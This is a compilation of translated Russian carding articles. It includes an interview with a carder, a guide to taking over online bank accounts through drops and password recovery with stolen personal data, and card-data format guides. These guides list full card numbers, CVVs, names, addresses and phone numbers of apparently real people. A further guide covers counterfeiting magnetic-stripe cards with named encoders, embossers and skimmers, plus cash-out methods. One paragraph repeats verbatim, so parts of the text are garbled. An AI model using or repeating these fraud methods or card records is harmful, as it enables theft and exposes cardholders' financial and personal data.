Better to get the cardboard yourself. Look for people who take it out from hosting and online stores. But rarely does anyone succeed. Basically, cards are sold on bourgeois networks such as DalNet and Efnet (most of the major channels, by the way, were recently closed). They are distributed by trusted people who live on it. Cardboard is considered to be of high quality if at least 95 out of 100 credit cards are valid. When this condition is violated, the seller is obliged to replace the goods.
You have raised a very important issue - the validity of the card. How to check a positive balance? Are there methods for this?
Yes of course. And there are quite a few methods. Starting from a banal check using porn sites (shamelessly outdated) and ending with X-logins. It is simply an account at
www.authorize.net. It's not easy to get access there - usually accounts are sold in various places, or are selected at random. The essence of this method is that the server sends a request to the bank, which answers whether there is an amount on the card. Although I believe that after all validations, the cardboard is no longer virgin, because all checkers take for themselves a certain percentage of the requested amount. For services. Therefore, if the person who distributes the cardboard has proven himself well, his product is not checked for validity.
Where does the carder exchange cards for goods? Can you give examples of resources?
I can not. This is classified information and is available only to trusted people. I can only say one thing - you shouldn't card Russian stores, it's pointless.
Why? Will they get caught?
If you observed anonymity, they will not be caught, but the goods will not be sent to you, this is a verified fact. And why break your own when there are bourgeois resources. Foreigners are naive people and willingly part with money.
Since we are talking about security, then this is the question. Why are cadres being caught - because of bad drivers and drops, or because of their own stupidity?
Philosophical question. The reasons may be different, but they are caught mainly on trifles (for example, due to access from a real IP address). There are also cases when the drop screwed up, thereby substituting the ass of the carder. The only good news is that in Russia, carding is equated to an ordinary fraud. Sometimes our valiant law enforcement agencies generally hardly imagine how you can buy goods on the Internet, and even paying with a credit card. But in any case, the police are trying to prove that the carder really carried out illegal machinations.
If they prove, they are judged?
Yes, but as I said, carding is just a scam. For this they give a suspended sentence with the confiscation of the computer. For details you can look into the criminal code - you will find a lot of interesting things there. By the way, there are not so many convictions for clothing carding. Mostly caught for real carding (forgery of plastic cards). Everything here is pretty serious, here, recently, guys were caught red-handed ...
What do you think about security? Can you give a list of useful programs that help the carder stay in the shadows?
Yes I can. But it should be noted that safety is not the carder's problem, but the driver's task. He uses a standard set of utilities that help him in this matter. Here is your cherished list - among the programs there are tools that the carder uses.
- SocksChain - creates a chain of proxies or Socks servers for anonymity
- A4proxy is an indispensable tool for working with HTTP proxies. Finds valid and anonymous ones from a huge list
- PGP - Softina for data encryption on the disk. As an alternative, I can suggest BestCrypt
One software is not enough. Can you tell me where they get anonymous Socks and Proxy servers? Or is it also classified information?
Buy. For this, there are their thematic resources. For example
www.proxyboss.net. In general, getting such things is not a problem - you just need to have an account on the site, or know the standing people who will always give you a megabyte leaf of proxy servers.
And now it's time for an "intimate" question. What is the earnings of a carder for a month of good work?
If we get lucky. It all depends on transactions that have been successfully completed over a period of time. Basically, from a dozen to a hundred profitable trades are performed. At the same time, if we talk about the average profit, the carder can receive from $ 1,000 to $ 20,000.
Not bad! Frankly, even I wanted to do such a profitable business.
Not so simple. For that kind of money and problems, you can make yourself. On the Web, there have been and will continue to exist rats who strive to throw an honest carder on the grandmother. I'm mainly talking about drops, they are not always honest people. Although anyone can throw it - the seller of cardboard, proxies, and even a driver. I will not be surprised at anything.
And how to determine that they are going to throw you? Or is it impossible to say for sure?
Of course not. As in real life, a person does not know who can throw him. This is a human factor. As a rule, scammers are blacklisted, which is viewed by all carders. In it you can find nickname, ICQ and drop coordinates (although, what prevents a dude from changing his nickname?). To do this, before hiring, the dude is asked for a scan of his passport. This procedure is also carried out for intimidation - a person will think twice about a scammer if he is asked to scan a document.
It's funny, but carders sometimes throw drops themselves. They promise them mountains of gold, and then slaughter them in full. At the same time, a naive bourgeois is not even capable of responding to a scam.
Bourgeois? Aren't the drops from Russia?
Not. Just the opposite. Drops usually live in the USA and other countries. Our cunning representatives can throw the carder, like send two bytes. Therefore, if you want your business to flourish, learn a foreign language, it will be very useful to you.
As folk wisdom says, the main thing is to stop on time. Is it relevant for a carder?
Undoubtedly! They are caught precisely because the carder goes too far. At first he cannot get enough of $ 1000, and then $ 50,000 is not enough for him. As a result, after the next big deal, the result is disastrous. Therefore, do not be greedy, and then everything will be ok.
What resources would you recommend for learning carder? Are there such people at all?
Carder.uk - this site has everything related to carding, I'm not afraid of this word. There you can find great articles, a forum where carding problems are discussed every day, as well as lists of trusted carders and scammers. This information is very helpful. It is noteworthy that they write about carding only in Russia and neighboring CIS countries. This is due to the fact that there are slightly different laws abroad, so caring did not take root there.
On this optimistic note, we will conclude our interview. And the last question - what would you like to wish the readers of the magazine? Choose an easy, at first glance, way to make a living or not take risks?
This path is far from easy. If someone is used to stealing, then such a job will be to his liking. And when life is just beginning, my advice to you is not to get involved in this dirty business, but to make money elsewhere. At worst, be just a fluffer, no more.
Thanks for the great answers. I think now the reader will understand that caring is a really dangerous business, albeit quite profitable. On my own I note that I completely agree with the author - if stealing is alien to you, you should not do this business. You will get less trouble on your ass.
Now you understand the complexity of the carder business. Starting and maintaining a business is very difficult. Constantly have to cooperate with different people and face scammers. But despite this, carding is flourishing and will be popular until new laws are introduced that will severely suppress such activities.
The author would like to thank JensMiller for the interview. This person learned the difficult basics of carding, and started like most carders - with a job as a driver.
Managing your online bank account.
Computer systems have become very densely embedded in our lives, so that we do not even think about them. Electronic payment systems, online stores, credit cards and much, much more entered the world just as smoothly. For example, electronic banks. Despite the fact that this is a very progressive invention, which is becoming more and more popular day by day (in the West), few people know anything about it. Let's try to fix it.
What is on-line banking.
Online banking, also known as electronic (e-banking) and home (home banking), is the remote management of bank accounts by means of a telephone (telebanking), a personal computer and the Internet (Internet banking) or portable devices (mobile banking). We will put telebanking and mobile banking aside for now. And I will tell you about the types of on-line banks.
There are so-called virtual banks - they work with clients exclusively via the Internet, and, unlike traditional banks, do not have a branch network. And there are traditional banks that use the power of the Internet to provide remote banking services to their customers. That is, in addition to its usual services, the bank uses Internet-based management of depositors' accounts as an additional service. Such a bank is called an Internet bank.
What is the advantage of Internet banking, you ask? The fact that wherever you are and whatever you do, having a computer with Internet access at hand, you can easily manage your capital. About 35 percent of Europeans who use the Internet do so. In Russia, things are a little different: since the number of Internet users is only 17 percent of the total population of the country, only one in two hundred and forty-seven users uses such a service as online banking. At the same time, he is a legal entity and understands software at an "above average" level. There are already 10 large banks in Russia that provide this service to their clients. According to information received from the Inter Finance website, two more will open in the near future, which means that there is still a demand for these services.
And a little more about the conveniences and possibilities of on-line banking. The list of standard operations with an account via the Internet, offered by banks to users, is almost the same everywhere. This is, of course, viewing the current balance and account status, transferring and replenishing funds. You can replenish your account both in cash and through an ATM using a plastic card. You can also close the account. But why? There are also bonus opportunities - for example, by filling out a special agreement, you can get a loan from the bank. And that's not all.
Obviously, when using on-line banking, you do not have to run to the bank and stand in line to receive money or replenish your account. All ingenious is simple. So, without taking the fifth point from the chair, you can perform almost all the same operations as when visiting a bank. Therefore, all sorts of smart people, like Boris Berezovsky, use the Internet banking system. Just imagine how the poor fellow would have to bother visiting several banks in different parts of the world, despite the fact that in some countries he is not allowed, and in some they can also be arrested.
By the way, some banks provide this service absolutely free of charge, it is enough to write an application.
Now more about bonuses. Each bank has both its own troubles and its own advantages. Since I could not travel around and call all banks that provide online access services (I am considering only Russian online banks), I allowed myself to use information from the Internet.
It turned out that in some banks there is a referral system (as, for example, in the good old sped). If you brought, say, one referral to Guta-Bank, then you get 2 months of free service. And if you are also an old client, then your friend will also receive 3 months of free. Guta-Bank also allows you to open a Visa Electron card for FREE.
In some banks it is possible to set a money transfer limit. Note that transfers via Internet banking are considered non-cash, and, accordingly, sales tax is not levied, which is a real chance to save your hard-earned money.
I'm sure you already wanted to open your account in some online bank. Read on, because that's what I'm going to tell you about. We will pay special attention to safety, since you will have to work with real money.
Unfortunately, it is impossible to be completely safe. Everything that is done by one person, another person is able to break. True, in Russian banks, protection is almost always at the highest level. And the user practically does not have to worry about the security of his system. Some banks have both software and hardware protection levels. From the hardware rooms, there are USB keys and adapter keys, similar in appearance and device to ordinary keys from intercoms. But that's not always good. What if my computer doesn't have a USB port? And if you go on vacation, you will have to take the adapter and key with you. After all, Internet banking was created in order to manage it remotely. You can lose the key, and you will have to pay for a new one even more than for the first one, since you will also have to pay for the deactivation of the old key. The keys are true are relatively inexpensive - within 800 rubles. If you ask which one to choose, I would recommend the USB dongle. It is more reliable. This key encrypts the data you transmit while working with the bank.
By the way, if the client (that is, you) thinks that the equipment that he purchased to access Internet banking does not suit him, then, according to the law on consumer protection, he has the right to return his money if he used the Internet -Banking no more than 30 days. And in Alfa Bank Express, the software is generally given to users free of charge (apparently, it is simply included in the cost of connecting to the service). Hence the conclusion - Russian banks are the most banking banks in the world! Americans don't have such bonuses. And at the same time, in most cases they have just a terrible authorization system. Do not trust? I'm ready to prove it. Take Bank of California and CityBank as examples. In CityBank, you are required to have a PIN-code of the card. On sale, you can easily find or trade cards with a pin code from someone. A California bank only needs a card number and password. And if you lose your PIN code or key, you will be told something like: "The rescue of drowning people is the work of the drowning people themselves" (I lost it myself, figure it out myself). And in order for them to commit themselves to finding a carder, you will have to pay them a certain percentage of the contribution or just pay a lot of money. These are the "American banks". Perhaps this is one of the few cases when in Russia some kind of service is organized really better than a foreign one. It is REAL, and not in accordance with the proverb "what for a Russian freebie - for an American 2 years in prison". You will have to pay them a certain percentage of the deposit or just pay a bunch of money. These are the "American banks". Perhaps this is one of the few cases when in Russia some kind of service is organized really better than a foreign one. It is REAL, and not in accordance with the proverb "what is for a Russian freebie - for an American 2 years in prison". You will have to pay them a certain percentage of the deposit or just pay a bunch of money. These are the "American banks". Perhaps this is one of the few cases when in Russia some kind of service is organized really better than a foreign one. It is REAL, and not in accordance with the proverb "what for a Russian freebie - for an American 2 years in prison".
So how can you secure your deposit? First of all, never and anywhere tell your access password, pin code. Pay attention to the data transfer protocol. If this is http, then it is worth considering, is it necessary? When the form page for entering credit card information opens, look at the address line, or rather, at the end of it. If you see "https" there, then you can fill out this form. If not, then leave this site. This also applies to online shopping. More than 40 percent of credit cards are obtained by carders by replacing the page of a site with their own, which writes numbers and other information entered by the cardholder into the log. The rest of the protection methods are standard. Use an antivirus program, a firewall, do not open attachments from incomprehensible letters, do not inform friends, and even more so to strangers.
Online Banking Review.
Now is the time to consider a real-life example of an online bank. This will be TPSBank (Tomsk).
This is how bank managers interpret the concept of "Internet banking":
“Internet Banking is a new computer system for making electronic payments through the global Internet network, which will allow you to make payments in rubles and foreign currency from anywhere in the world through our bank with maximum speed and reliability, as well as receive statements on your accounts and exchange messages with bank employees, while saving a lot of time. All you need to have with you is a private key diskette and Internet access. Such a system should become the main form of communication between the client and the bank in the field of settlement services. " Well, well, it means that this bank uses a protection system using a key on a floppy disk. Well, that's a good option. When registering (offline, in a real bank), the user is brought to the computer, he presses a button in the generator, thus creating a key. The key is written to the database opposite the login and password. That is, the user first logs in and then uses the key. Login and password are not encrypted with this key.
The key lies in the database, and all the information received from the user is first sent to the server encrypted, where the key corresponding to this user is taken, and the information is decoded.
Here's what you can do using TPSBank's Online Banking service:
- Send to the bank all types of financial documents, including payment orders, and carry out currency transfers.
- Receive from the bank statements on their accounts for any period from the moment the account starts working.
- Exercise control over the current state of documents in the bank.
- Exchange messages with bank employees.
To register, we need:
- Open an account with OJSC "Tomskpromstroybank" (if there is no account).
- Carry out a preliminary registration using the "Internet Bank" system, generate and register the client's EDS keys.
- Obtain a client's public key certificate, print and certify it with a round seal and signatures of responsible persons, samples of which are contained in the bank card of signature samples.
- Download the contract form for servicing in the "Internet Bank" system and fill it out.
- Conclude an agreement for service in the "Internet Bank" system and make the final registration with the bank (if you have a printed certificate).
Note: information about the bank was taken from its website and has not been changed by the author.
I would like to present to your attention one more bank called O.V.K. Bank". He just amazed me with his phenomenal frivolity. For authorization, you need to know ONLY the credit card number and expiration date (expiration date of the credit card). At worst, only the number. Probrute-force the end date is easy. Indeed, this year the maximum card validity period is approximately until 2010. Thus, having 12 months in each year, we get 120 combinations. This can be picked up by hand, without the help of special software.
A little about carding.
If you know what carding is and are interested in it, then you should know that carders very often look for cards with online access and buy them for big money. I can say it's worth it. Anyone who has tried carding has probably noticed that it often happens like this: you order something substantial, for yourself or for a drop on the left credit, but it does not come. And the fact is that, by default, the goods can only be sent to the billing address, that is, to the address of the card holder. But others order somehow! And they do it like this: they go into online banking and change the details of the account holder (and, accordingly, the credits) to the details of the drop. Some banks allow online changing even the SURNAME AND NAME of the owner. But this is not necessary in most cases. And if the order is checked in the e-shop, then they call the bank that issued the credit card, on which the order was made. Naturally, they are told that the owner of the credits has the address and phone number that you entered. The store will take note of this and may call again, but not to the bank, but to the drop, who will confirm the order.
But if you have not changed the billing address of the credit card at the bank, and by calling there, the store managers will find out that this is not the address of the real owner of the credit, then they will easily recognize his real phone number (which you have not changed). Then they will call him and ask if he ordered a twin-engine yacht for Vasisualy Pupkin. If not ... then he is told the details of the drop with all the ensuing consequences.
As you noticed, to access a bank account you usually need a credit card number and password, less often a username and password. When registering, confidential user data are usually indicated. For example, the mother's maiden name, insurance policy number, date of birth, etc. But getting credit cards with this information is not difficult. How hackers do this, I don't know, perhaps with the help of Trojans, or they hack these very online banks. But the password ... if you have a credit card with all the info (SSN, MMN, DOB), you can try your luck and try to recover your password. Some banks offer to recover your password directly online, but in most cases you will have to call the bank's support service, where you will need to name all this information. If you say everything correctly, your password will be changed.
What is CC
CC is a Credit card.
VISA
Eurocard / Mastercard
JCB
DinersClub International
DinersClub valid in Russia
American Express
Visa Electron
Eurocard / Mastercard Cirrus / Maestro
VISA
- on the VISA card, after the expiration date of the card, a “V” icon is displayed, the same as the first letter of the logo;
- Initial Visa digit - 4
- The card number is repeated on the signature field (reverse side) + 3 digits of the secret code
Eurocard / Mastercard
- after the expiration date of the card, the MC icon is displayed on the Eurocard / Mastercard
- The initial Eurocard / Mastercard number - 5
- The card number is repeated on the signature field (reverse side) + 3 digits of the secret code
JCB
- on the JCB card after the expiry date of the card there is a "J" or "JCB asterisk" icon - JCB
start digit - 35
DinersClub
- on the DinersClub card after the expiration date of the card there is a logo circle with a vertical line
- DinersClub initial numbers - 30, 36, 38, 39
- On the signature field (reverse side) the card number is repeated + 3 digits of the secret code
- On the front side on the right there are two secret code letters
American Express
- AmericanExpress starts at 37
- there are Centurion, Corporate, Optima and Hertz cards
The data you need for carding:
CC number
CVC
EXP
First name
Last name
Street, house number
Sity
Country
State
Zip
Phone number
СС is a credit card, we also have the necessary information from it, it is also called ss, cardboard, potatoes, cards, etc.
Let's figure out how the cc info of the three most necessary and popular countries looks like. (USA / UK / DE)
We do not parse full info, i.e. nothing extra, just basic.
USA (United States):
5256502253097617 - The number cc (credit card num)
0910 - exp (card expiration date) 09 month 10 year
502 - cvv (secret code)
Jorge Bailon - cardholder name
15760 SW 69 ld - street
miami - city
FL - state
33193 - zip code
US - country (coutry)
3055051991 - phone number (phone num)
VISA - card type (type)
You can also add SSN, DL, MMN to USA cc, DOB, credit report, etc. etc.
UK (United Kingdom):
5178057252945584 - cc num
1211 - exp
849 - cvv
Feiyue Ma - cardholder name
8 Wilberforce Road - street
Norwich - city
NFK is a kingdom, state, county, etc. (county)
GB - country
NR5 8ND - zip code
07883894260 - phone num
Master Card - type
In UK, as a rule, only DOB is taken as additional information. Still sometimes sort code (ss sorting code), this infa is needed
to bypass vbv (verified by visa).
DE (Deutschland):
4344990165183012 - cc num
1112 - exp
830 - cvv
via Visa - of the type
Alexander Reitzenstein - the cardholder name
Wichertstrase 38a - street
Berlin - o city
10439 - the zip-below code
030/20055321 - Image phone num
Deutschland -'s coutry
In Germany, usually at vbv asks DOB, no state ...
The first thing that a novice carder should learn is, of course, information about credit cards, in other words, cardboard / SS.
So let's get started.
The first thing we need to do is find some cardboard. The easiest option is to buy it from a seller. Upon purchase, you will receive сс in approximately the following format:
4306651004564350 | 10/10 | 826 | Richard Lang | 56 Groveview Cir | Rochester | 14612 | NY | USA | 661-298-0881
(The format is different for each seller)
• 4306651004564350 - Credit card number.
• 10/10 (10 month / 10 year,) - Card expiration date.
• 826 - CVV / CVV2 card security code
• Richard Lang - First and Last Name (?? name, Surname)
• 56 Groveview Cir - Address
• Rochester - City
• 14612 - Zip code (zip)
• NY (New York) - State
• USA - Country
• 661-298-0881 - Phone
For additional $ you can punch out additional information:
These points are broken through mainly to create Enroll'a, so if you are interested in just driving in, then you most likely will not need them.
• DOB - date of birth
• SSN - social security number
• MMN - Mothers Middle Name (mother's middle name, so to speak)
Now a little more concrete, regarding each type of map:
Visa
• Visa credit card numbers start with 4
• Verified by Visa (VBV) protection • Verified by Visa
3-digit CVV
is a unique service that uses a personal password or identification information to protect Visa card numbers from unauthorized use. Simply put, the holder has a code that he will have to enter when buying something.
MasterCard
• MasterCard credit card numbers start with 5
• There is a protection called MasterCard SecureCode (MCSC)
• 3-digit CVV code
MasterCard SecureCode - the principle of operation is the same as that of VBV.
American Express
• American Express credit card numbers start with 3
• 4-digit CVV code
Discover
• Discover credit card numbers start with 6
• 3-digit CVV code
How to identify Zip / State / Phone
1) Go to the site zipcodes.addresses.com/zip_code_lookup.php
(For example, we have a city and a zip, how to determine the state? | Summerville | 30747 | United States
2) Drive the city into the City field and select the first state that comes across. (let's say it will be GA)
3) Next, the result is displayed to us, where we check the Zip that is indicated in the cardboard and where the ZIP COD field is indicated on the site.
4) As we can see, the Zips matched, which means our state is GA
5) The first three digits of the state phone are also indicated in the AREA CODE field
Bin - the first 6 digits in the credit card number, the identifier of the bank that issued the card.
For example, card 4306651004564350, where 430665 is the number of the bank that issued the card:
Wescom CU DEBIT CLASSIC USA Pasadena California CA
site for punching: binchecker.com
Here's more on the edge:
4128004082601569 - This is the NUMBER of the card itself!
After that, you can see what is written VISA (choose VISA)
09 | 2014 - This is the month and year of the end of the card basically it is spelled like this 0914!
| Catherine | Chandler | - This is the name and surname of the cardholder (card holder)!
| 952 | - This is the CVV card code
| 308 Swagg Cove Rd. | - This adress
| Wedowee | - This city
| AL | - This is the state
| 36278 | - index or post code
| USA | - of course the country of the map
The rest will not come across, but for clarification:
| 7702965721 | - owner's phone number (drive skype over them)
|
[email protected] | - This is the e-mail of the cardholder (cardholder)
COUNTRY - This is the country
FIRST NAME - Name
LAST NAME - Surname
STREET ADDRESS - Address
CITY - City
STATE / PROVINCE - Province or state depending on where you live!
ZIP CODE - Index
PHONE - Phone number, well, write nonsense here)
EMAIL - your e-mail
Now about the cards:
3 starts - AMEX (American Express)
4 starts - VISA
5 starts - MasterCard
6 starts - Discover
Encryption of ICQ and other programs
If you are worried about the problem of intercepting messages by an evil admin and other special services, then the Simp Lite-ICQ-AIM output, which supports MSN Messenger, Yahoo! Messenger, ICQ / AOL Instant Messenger (AIM), Jabber / Google Talk.
Encryption of messages in MSN Messenger, AIM, ICQ, Yahoo! and encrypted file transfer to MSN Messenger and ICQ.
To encrypt messages and files themselves, symmetric ciphers AES, 3DES, CAST and Twofish with a key length of 128 bits are used.
For secure transmission of the symmetric key of the encrypted session and authentication of the interlocutors, asymmetric ciphers RSA 2048-4096 bit, ElGamal / DSA 1024/2048 bit, Elliptic curve over GF (p) 256/521 bit are used.
The program works with IM clients in two modes:
1) Emulations of the IM server - the client sends messages to the local server, where they are encrypted and sent to the real server of the IM network. If you have a super-duper non-standard client, then its capabilities may be limited by the capabilities of the local server. 2) SOCKS4 proxy emulations - recommended mode. The client is configured to work through a local SOCKS4 proxy on which everything will be encrypted.
The program itself can configure standard clients to work through itself, while in alternative clients the server will need to be registered manually.
The program itself also supports work through a SOCKS4 / 5 / HTTP proxy, so a direct connection to the Internet is not required for it.
Naturally, for encryption to work, it is necessary that all participants in the conversation have IM clients working through this program. For undemanding home users, there are free Lite versions for each protocol. For corporate users and home users with ambitions - the Pro version.
Setting up the icq program
1. generate 1 key of each type (length)
2. write in the ACS sox 4 or 5 with IP 127.0.0.1 and port 15190
3. run the asya, if it is loaded, then it works
Configuring the jabber program
1. generate 1 key of each type (length)
2. write in jabber sox 4 or 5 with IP 127.0.0.1 and port 15222
3. run the toad, if it is loaded, then it works
download secway.fr/us/products/simplite_icq_aim/update.php']Simp Lite-ICQ-AIM[/URL]
download ecway.fr/us/products/simplite_jabber/getsimp.php']SimpLite-Jabber[/URL]
Features:
- key exchange based on the asymmetric RSA algorithm with adjustable key length
- encryption with symmetric algorithms in the AES-Twofish-Serpent bundle
- automatic decryption of incoming messages if encrypted and the password converges (support for offline messages)
- generation of a custom hash format from the user's password
- it has been experimentally established that you can send a message with a length of about 1200 characters at most, since the volume of the sent text is increased by 2-3 times
- the ability to set different passwords for different contacts
- no additional programs
are required - simple and convenient on / off encryption
Enabling / disabling encryption, as well as setting a password, is carried out using the buttons under the interlocutor's avatar in the chat window.
Secure IM - plugin for encryption of correspondence Miranda
The plugin has resource capabilities to encrypt your messages on AES192 or PGP / GPG.
Support Unicode, tabSRMM and Clist
Plugin requires Crypto ++ service
download service addons.miranda-im.org - Crypto
download plugin addons.miranda-im.org/details.php?action=viewfile&id=2445 - SecureIM
RatCrypt - plugin for RnQ messaging encryption
Encryption of correspondence between 2 RnQs with installed plugins
- Encryption algorithm - AES 256bit
- Encrypted using a password or a file with a key
download plugin
RatCrypt
SecuredRQ - Encryption plugin for & RQ
Description:
The plugin is designed to encrypt transmitted messages using the Oscar protocol. Outgoing messages are encrypted using the RSA algorithm, 128-bit key. Encoding / decoding is done using public / private keys.
Features:
- Encryption of messages with a 128-bit key using the RSA algorithm.
- Configuring a template for encrypted messages
- Pop-ups in the SysTray area
- Smile marking encrypted messages
Requirements:
& RQ by Shyr not lower than version 0.9.7.2.
The plug-in was also tested for R&Q 1014 by Rapid.
Notes:
For SecuredRQ to work, a plugin is required on both sides.
Plugin is NOT COMPATIBLE with SecureIM.
Download plugin andrq.org/forum/viewtopic.php?t=1887 - SecuredRQ
OTR - plugin for encryption of correspondence Pidgin
Off-The-Record (OTR) messaging allows you to conduct private conversations via instant messages, providing:
- encryption (no one will be able to read messages),
- authentication (the ability to make sure that the interlocutor is who he claims to be),
- anonymity ( after the conversation is over, the received messages cannot be unambiguously associated with the identities of the interlocutors),
- the safety of previous messages (if your private key is in the wrong hands, you do not have to worry about the safety of messages).
By installing Pidgin, you maintain both your contact list (if you already have one) and the ability to connect with other users; it is only important that all of you exchange information using the same protocol (for example, ICQ).
First you need to install Pidgin, then ndrq.org/forum/viewtopic.php?t=1887
OTP poplinux.ru/node/76
An article for the Paranoid))) thank you all!
P.S. Any software that can't be downloaded ... you can google it and download it!
How do real carders live?
Weapons, shots, blood - all this in the recent past was an indispensable attribute of bank robberies and collectors. With the advent of credit cards and the development of carding, everything has changed. Now there is no need to break into a bank with a machine in hand and demand cash. It is enough to get access to the cardholder's bank account and withdraw his money from the account. This can be done in several ways, one of which is counterfeit credit cards, or "white plastic".
Standardization of plastic cards.
It is impossible to start working without knowing what plastic cards are. Therefore - about everything in order. You probably know that there are different cards (with a magnetic stripe, chip, BSK, etc.). In general, they can be classified according to the methods of recording and processing data:
- magnetic stripe cards (magnetic cards);
- cards with an embedded microcircuit (contact and contactless chip cards);
- barcode cards (barcode cards);
- embossed / printed cards (with information printed by embossing or thermal printing).
A real carder is usually interested in magnetic and chip cards, since they are used by payment systems. The size of the cards is called ID-1 and is 85.6x53.98x0.76 mm. The front side of the card is an obverse, it can contain a chip, information about the issuing bank, card number and the logo of the payment system. On the reverse side - the reverse - there is usually a magnetic stripe and a signature strip. The embossing zones of the information are also fixed by the standards. For example, the line with the identification number is located 20 mm from the bottom edge of the card and cannot exceed 19 characters. Below it is an area for applying the data of the cardholder (card holder) and Expire Date (expiration date of the card). In addition to embossing, thermal printing is used - printing on a card by thermal diffusion (when applying logos). Information,
Briefly about chip cards.
It would be unfair not to mention chip cards in the article, as they are widely used by Russian banks. Such cards are divided into 2 types:
contact chip cards;
Contactless chip cards.
Contact cards contain a "pocket" on the obverse (front side) for placing the chip. A special glue is applied to the chip module itself, after which the microcircuit is glued into the "pocket". A chip is a microcomputer that processes incoming commands (which is why such cards are called smart cards). It implements a protected memory area, information in which is encoded with secret keys. Chip technology is constantly being improved. As for the BSK (contactless chip cards), an antenna is located inside their perimeter, which allows the cards to exchange data with the card reader using radio frequencies. I must say right away that in the article I will not describe the methods of counterfeiting chip cards, since the main target of real-carding is magnetic cards.
The mystery of the magnetic stripe.
It should be noted that 90% of international payment systems use magnetic stripe cards. I will dwell on them in more detail. The magnetic stripe is located at a distance of 5.5 mm from the upper edge of the back side of the card and can contain 2-3 tracks. The width of the strip depends on the number of tracks and is 6.4 mm with two tracks and 10.3 mm with three tracks. As you understand, all the information necessary to carry out financial transactions is on the magnetic stripe.
Now let's look at each of the three tracks. The first track includes alphanumeric information. It can hold up to 79 characters. The track contains the following data:
- identification number - up to 19 digits;
- country code - 3 digits;
- Full name of the cardholder (card holder) - from two to 26 characters;
- Expire Date (card expiration date) - 4 digits;
- service code - 3 digits;
- issuer information - remaining digits.
The second track contains only digital information encoded with a binary-decimal code. A track can have up to 39 characters in total. The second track duplicates the information of the first, with the exception of the cardholder data.
The third track is optional. It contains digital information and is encoded similarly to the first track. The maximum number of characters per track is 107.
You ask: "Why do we need all this?" The answer is simple: a real carder can independently write data to the tracks of a magnetic card. But more on that later.
Carding, or making money
As they say, let's move from theory to practice. All actions of a real carder can be distributed in accordance with the following plan:
- counterfeiting a plastic card (embossing, logos of payment systems - in a word, giving a piece of plastic a presentation =);
- data recording on a magnetic stripe;
- cashing out / shopping (what the higher actions are required for).
I'll start with the first point. Here the carder needs to decide on the consumables. If he is going to pour money through ATMs, then white plastic with a magnetic stripe is enough for him, and if he plans to go shopping, then he will already need a high-quality credit card with elements of thermal printing and embossing. I will consider the second option in more detail, since, although it is associated with a laborious manufacturing process, it assumes a full-fledged, ready-to-use product at the end =). I must say right away that to open his own "laboratory" for the production of cardboard (credit cards), the criminal will need certain financial investments, which, however, will pay off with a skillful approach.
The first vital thing is plastic with a soldered magnetic stripe. Getting it now is not a problem. The most common type of plastic is CR-80.
Also, for dirty business, you need a high-quality printer, with the help of which printed text and emblems will be applied to the plastic. A real carder pays special attention to the choice of a printer, since the appearance of the cardboard directly depends on it. As an example, I will name the Eltron P210i, which is used to print IDs, badges, etc. It is suitable for borderless one-sided printing and prints cards almost perfectly at 300 dpi. Eltron P210i also allows you to apply barcodes, photos, graphics and text. True, it costs about $ 2000, but this is not a hindrance, since all the costs of a novice carder, as mentioned above, are recouped.
The next step is to "extrude" the initials of the cardholders, the issuing bank, the card number, etc. on the card. For this there is an embosser. One of the options is the Matica Z1, which has a compact size and is capable of issuing up to 600 cards per day. The cost of this unit is about $ 3500. In order to color the embossed symbols on the map, you need a tipper. The most common choice is the Matica Z Tipper, which will give the carton its proper look in just a few seconds. The price of such a tipper ranges from $ 1600. In addition to embossing, tipping and printing, a hologram and a signature strip are required on the card. The latter, made of special paper, is glued to the back of the credit. It must be signed (in theory, the owner of the credit, without which the card is considered invalid. As for the hologram, then the situation is somewhat more complicated. The original hologram is almost impossible to tear off the surface of a credit card. It is not difficult to peel off the hologram from the majority of counterfeit cardboard boxes, so carders pay close attention to this problem.
So, I talked about working with plastic. But just beautifully colored cards are of little use, so let's move on to the second stage - writing data to the magnetic stripe. For this, the carder purchases an encoder - a device for reading and writing magnetic stripe cards. Encoders can record 2 types of maps - high and low coercivity (high and low magnetization). Better is the one who "understands" any cards.
Encoders are also divided into 2 types depending on the number of tracks (tracks) to be recorded. Do not try to choose the exact encoder that records all 3 tracks, since the third track is not used by either POS terminals (except in rare cases) or ATMs. The second track plays the main role here. With its help, you can manually create the first track based on the data available in the second. These two tracks are usually used (first and second). The third track, as a rule, has on itself any additional information that is not of fundamental importance (system of discounts, bonus points of the owner of the credit, etc.).
Among the popular encoders, I can mention AMC C722 and MSR206. AMC C722 writes and reads the first two tracks; he showed himself excellently in "combat" conditions. For the price, it will cost you $ 800. After choosing and buying an encoder, the criminal needs to get dumps that are written on the magnetic stripes of the cardboard boxes. There are 2 options here:
- carder buys dumps from sellers (people who sell credit dumps);
- the carder extracts dumps on its own.
With the first option, I think it's clear. A certain amount of vmz / egold / etc is taken, a person / service for the sale of dumps is looked for, and the purchase takes place. But with the second method, everything is much more interesting. Here you need to be smart and somehow consider a cardholder's credit card as a skimmer (a device for reading data from a magnetic stripe). There are known cases of collusion with waiters in a cafe / restaurant (hotel managers) who, for a fee, read dumps from visitors' credit cards with a skimmer and passed them on to a cybercriminal. But usually carders are purchased from sellers and do not worry about this issue. Having received the dumps, they cut the encoder to the computer, put the necessary software (which sometimes comes with the encoder) and roll up another cardboard.
Harvesting the harvest
After all the actions described above, the criminals proceed to the third, most responsible point of the plan - cashing out or shopping. There are some nuances here. If you know the pin code, then the most convenient way is to go to the ATM. But if a person rolled a dump on the credit, but there is no PIN from the card, then the situation becomes more complicated. The option with cash out at an ATM disappears immediately, since there entering a pin code is a prerequisite. Shopping remains. Moreover, the carder searches only for those stores in which POS terminals are installed that do not require a pin. You can distinguish them by the absence of a keyboard for dialing a pin code. But, as practice shows, they are rare in Russian stores. True, the system with travel abroad for subsequent goods in bourgeois shops is still working. But for its implementation, documents are needed, tickets and waste schemes. Generally speaking, such shopping is extreme in the truest sense of the word. After all, it is not
known what a person can expect in case of an unsuccessful transaction: surprise of the cashier, calling the police or the police (abroad), calling the bank, etc. Whatever one may say, it is impossible to calculate all the options.
I'm sitting behind bars in a damp dungeon.
As you understood from my article, carding is associated not only with material investments, but also with a colossal risk. Recently, cases of successful detention of carders by officers of the Ministry of Internal Affairs and the FSB have become more frequent. Some well-known carders have voluntarily terminated their activities. And I advise you not to start. Carding is a crooked road, and the chances that it will lead you to something good in life is very small. In order not to be unfounded, let me remind you of article 187 of the Criminal Code of the Russian Federation "Production or sale of counterfeit credit or payment cards and other payment documents." Under this article, it is realistic to get from two to six years (or from four to seven, if there is an organized group). Think at your leisure what is more dear to you: a beautiful but short life in freedom or freedom. I think the choice is obvious - freedom is more expensive.
